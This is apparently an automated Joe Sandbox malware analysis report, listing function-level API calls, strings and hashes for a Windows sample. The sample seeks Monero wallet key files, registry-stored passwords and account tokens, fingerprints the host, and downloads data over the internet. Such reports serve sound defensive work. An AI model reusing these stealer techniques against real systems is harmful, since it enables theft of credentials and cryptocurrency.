Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A

DeleteFileA.KERNEL32(00000000), ref: 003414EF

Strings

wallet_path, xrefs: 00341330
.keys, xrefs: 0034136B
\Monero\wallet.keys, xrefs: 0034138D
SOFTWARE\monero-project\monero-core, xrefs: 00341335

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 491ad8e62a497fda90276e12ae9eac965e416a9a8077477b28e214bd90c5438e
Instruction ID: 226c586de33bfb8ee8ddb02baf87a1b6b1c457750d53f3718ca83b43cd6b0490
Opcode Fuzzy Hash: 491ad8e62a497fda90276e12ae9eac965e416a9a8077477b28e214bd90c5438e
Instruction Fuzzy Hash: B95163B1D1051857CB16EB60DC92FED777CAF54301F404298BA0AAA091EF306B8DDFA6

Function 00357500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00357542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0035757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357603
RtlAllocateHeap.NTDLL(00000000), ref: 0035760A
wsprintfA.USER32 ref: 00357640

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Strings

6, xrefs: 0035764D, 00357655, 0035761B, 00357623
C, xrefs: 0035754C
:, xrefs: 0035755C
\, xrefs: 00357560

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$6
API String ID: 1544550907-1570250246
Opcode ID: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
Instruction ID: e7d75af0a8dad5e6672adc0dc126fe16b35dcfc26427bb85886183c1fed48ae2
Opcode Fuzzy Hash: 14e2577ab4503efef5197481779491e1420f8146ca8f02b7aa7cb7be705484e3
Instruction Fuzzy Hash: A84173B1D04258ABDB11DB94DC45FDEBBB8AB18701F100199F9057B290E7746A48CBA5

Function 003475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003472D0: memset.MSVCRT ref: 00347314
Part of subcall function 003472D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0034733A
Part of subcall function 003472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
Part of subcall function 003472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
Part of subcall function 003472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
Part of subcall function 003472D0: HeapFree.KERNEL32(00000000), ref: 00347459

lstrcat.KERNEL32(2F7EC020,003617FC), ref: 00347606
lstrcat.KERNEL32(2F7EC020,00000000), ref: 00347648
lstrcat.KERNEL32(2F7EC020, : ), ref: 0034765A
lstrcat.KERNEL32(2F7EC020,00000000), ref: 0034768F
lstrcat.KERNEL32(2F7EC020,00361804), ref: 003476A0
lstrcat.KERNEL32(2F7EC020,00000000), ref: 003476D3
lstrcat.KERNEL32(2F7EC020,00361808), ref: 003476ED
task.LIBCPMTD ref: 003476FB

Strings

: , xrefs: 0034764E

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
Instruction ID: 0fc42ac95f7768f061496f6957e38b26fc4b05c3fd6cec1fc74ed75e3bd5d0ba
Opcode Fuzzy Hash: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
Instruction Fuzzy Hash: 56316B71D00109DBDB06EBA4DC85DEE73B9FB64301B14410AF502BB295EB38A94ADB61

Function 003472D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00347314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0034733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
HeapFree.KERNEL32(00000000), ref: 00347459
task.LIBCPMTD ref: 00347555

Strings

Password, xrefs: 00347401

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 2985e877dd5f8ee819c8255b22441a18c0d65ad4be52eff404eb0dcf32a7741b
Instruction ID: 110d6a954d6ccf0d59b68c102cc5e418409f4dd9f7835e4a00ada91fd56a6b09
Opcode Fuzzy Hash: 2985e877dd5f8ee819c8255b22441a18c0d65ad4be52eff404eb0dcf32a7741b
Instruction Fuzzy Hash: FC611BB591415C9BDB25DB50CC45BEAB7F8BF44300F0085E9E649AA241DBB06BC9CFA1

Function 00358100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0127E2B0,00000000,?,00360E2C,00000000,?,00000000), ref: 00358130
RtlAllocateHeap.NTDLL(00000000), ref: 00358137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00358158
__aulldiv.LIBCMT ref: 00358172
__aulldiv.LIBCMT ref: 00358180
wsprintfA.USER32 ref: 003581AC

Strings

@, xrefs: 0035814D
%d MB, xrefs: 003581A3

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: cf6decc5483efa2b29a07b9b965c857080c4ee72954abf435fd66079df15c706
Instruction ID: 68399cfc7c9211d717bc17adf2d5ead759dc4a2bacf08861aadc1e5aa5b51d57
Opcode Fuzzy Hash: cf6decc5483efa2b29a07b9b965c857080c4ee72954abf435fd66079df15c706
Instruction Fuzzy Hash: 4A2160B1E44208ABEB10DFD4CC49FAFB7B8FB44B01F104509FA05BB290D77859058BA5

Function 0034BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

lstrlen.KERNEL32(00000000), ref: 0034BC9F

Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0034BCCD
lstrlen.KERNEL32(00000000), ref: 0034BDA5
lstrlen.KERNEL32(00000000), ref: 0034BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0034BBEB
AccountId, xrefs: 0034BCC4
AccountTokens, xrefs: 0034BABA
AccountTokens, xrefs: 0034BB49

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 2607124d12732631e5eb1718ba3879ce606e73177d1f3986b1a1ac823fe00c18
Instruction ID: 84ab634ebc210bc8fc7e077252520eba4bcc0169042389bdc9e9905ca23b7e6d
Opcode Fuzzy Hash: 2607124d12732631e5eb1718ba3879ce606e73177d1f3986b1a1ac823fe00c18
Instruction Fuzzy Hash: B4B154719105089BDB06FBA0CC96EEE7778BF54301F404259F907BA1A1EF346A4DEB62

Function 00344FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00344FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00344FD1
InternetOpenA.WININET(00360DDF,00000000,00000000,00000000,00000000), ref: 00344FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00345011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00345041
InternetCloseHandle.WININET(?), ref: 003450B9
InternetCloseHandle.WININET(?), ref: 003450C6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: f29c49876981f0364de52d0d75a61d06598a330a13edb09a4c6648272eb3547b
Instruction ID: 9310433d5de8995ae9423d97f94cce1c31634d6d7af534f61c4ed6398a3ce1cb
Opcode Fuzzy Hash: f29c49876981f0364de52d0d75a61d06598a330a13edb09a4c6648272eb3547b
Instruction Fuzzy Hash: B13104B4A00218ABEB20CF54DC85BDDB7B4EB48704F5081D9EA09B7281D7706E899F99

Function 003583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
wsprintfA.USER32 ref: 00358459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0035847B
